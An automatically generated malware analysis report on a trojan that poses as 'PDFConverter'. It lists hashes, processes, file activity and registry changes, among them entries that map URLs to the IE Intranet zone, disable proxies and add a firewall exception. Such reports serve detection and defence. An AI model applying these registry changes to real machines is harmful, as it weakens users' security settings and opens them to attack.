Gen.Trojan.Heur.jv1I5ix9sdi_0c00fa4f69

by malwarelabrobot on August 27th, 2014 in Malware Descriptions.

Gen:Trojan.Heur.jv1@I5ix9sdi (B) (Emsisoft), Gen:Trojan.Heur.jv1@I5ix9sdi (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 0c00fa4f697edf668ff2f9d92078b309
SHA1: 37f107c35ef69c3ddcadcda1e9d075f4f4454481
SHA256: 8f8d5ef6416196bfd72aba0c4238ddc9b64842c8bb154eaa66f0fc38112c05cc
SSDeep: 24576:CeQxAIEXi6kgaINV7DBl8EWvPR PMQZ6p6HBy/4Ojh3sNzHh0OAkZo:8 IEXiTcN5X8NaL0pCBAV3sVKOAko
Size: 1207384 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: PDFConverter
Created at: 2014-07-24 11:29:40
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

9.tmp:1968
nsr6.exe:1668
tmppack.exe:1628
2.tmp:500

The Trojan injects its code into the following process(es):

%original file name%.exe:320

Mutexes

The following mutexes were created/opened:

RasPbFile
ShimCacheMutex
{69C867F8-341A-44a8-B8F2-AF392F12143A}974448true
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
_!MSFTHISTORY!_
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!history!history.ie5!
WininetStartupMutex
WininetConnectionMutex
WininetProxyRegistryMutex
CTF.LBES.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Compart.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Asm.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Layouts.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.TMD.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
_!SHMSFTHISTORY!_
c:!documents and settings!adm!local settings!history!history.ie5!mshist012014082620140827!

File activity

The process 9.tmp:1968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\broker\broker_check.log (185169 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\config.xml (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\timing.dat (121 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\ping.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\postback.xml (50 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\broker\config.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\postback.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\ping.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\timing.dat (0 bytes)

The process %original file name%.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\b4.gif (661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\arrow.gif (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4175_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4169.html (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4167_feature_.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\btn2.png (402 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4166_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4176_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4174_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4167_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn1.png (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4171_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\red-pb-act-right.jpg (694 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn3.png (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\utils.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\b-bg.gif (295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4171.html (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ajax-loader.gif (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\b3.gif (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\config.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4167_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn4.png (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4176.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4167.html (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4173.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4169_feature_835.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\pb-bg.jpg (333 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4175_attr_15.png (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\smart.js (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\jquery.noselect.min.js (299 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\events\events.js (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\lbg-top.gif (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4174_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn2.png (136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\jquery-1.7.min.js (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\lbg-bottom.gif (8 bytes)
%System%\wbem\Logs\wbemprox.log (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4172_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\9.tmp (6403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\speedanalysis.ico (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\mid.jpg (403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4173_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\trust.gif (437 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4171_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\idsqqskweu (2615 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4176_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4175_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\wizard.xml (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LSAKGIUG\tmppack.exe (3804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4169_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\main_old.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\red-pb-act-left.jpg (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~39F.tmp (80 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4175.html (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\btn.png (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4172_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\check.jpg (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~6.tmp (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\old4167.html (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\red-pb-act.jpg (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\conditions\conditions.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4166_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4172.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\arrow.png (911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\center2.jpg (305 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4174.html (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\template_40.png (110 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ajax-loader2.gif (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\main.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4166.html (33 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\pb-bg-right.jpg (468 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\lbg.gif (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\pb-bg-left.jpg (460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4169_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4173_attr_46.bmp (42 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\LSAKGIUG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (0 bytes)

The process nsr6.exe:1668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\inetc.dll (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\SPtool.dll (65457 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\Logs\sp_nsr6.log (1847 bytes)
%Program Files%\SearchProtect\Main\rep\SystemRepository.dat (590 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\SPtool.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\System.dll (0 bytes)

The process tmppack.exe:1628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\LSAKGIUG\installer.pak (9606 bytes)

The process 2.tmp:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.exe (72144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc5.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GT6VKRAN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPYZIJUB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc4.tmp (2821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZUR84N48\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVCXCDUB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVCXCDUB\SPIdentifierImpl[1].exe (72144 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc5.tmp\inetc.dll (0 bytes)

Registry activity

The process 9.tmp:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\usyndication.com]
"UID" = "{838DF089-038D-4F4E-A007-4F5D022E1478}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 97 EC 6F 45 67 3A 6D 76 4F D2 88 89 2A 18 44"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014082620140827]
"CacheOptions" = "11"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014082620140827]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014082620140827\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014082620140827]
"CacheRepair" = "0"

"CachePrefix" = ":2014082620140827:"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 73 1A 88 EE 4A CD 07 84 72 5B E3 71 12 EF AE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014082620140827]
"CacheLimit" = "8192"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "C:\%original file name%.exe:*:Enabled:%original file name%.exe (in)"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]

The process nsr6.exe:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 90 7B 64 4E 34 78 7E 8A 8B 51 3B 8E 47 67 9C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process tmppack.exe:1628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE EE C4 A1 9B ED 7F 81 82 1D 80 D2 95 B8 D1 70"

The process 2.tmp:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc5.tmp\,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 B4 8A CC B3 0D 3F A0 C1 BF CF 8F E5 6C D5 79"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
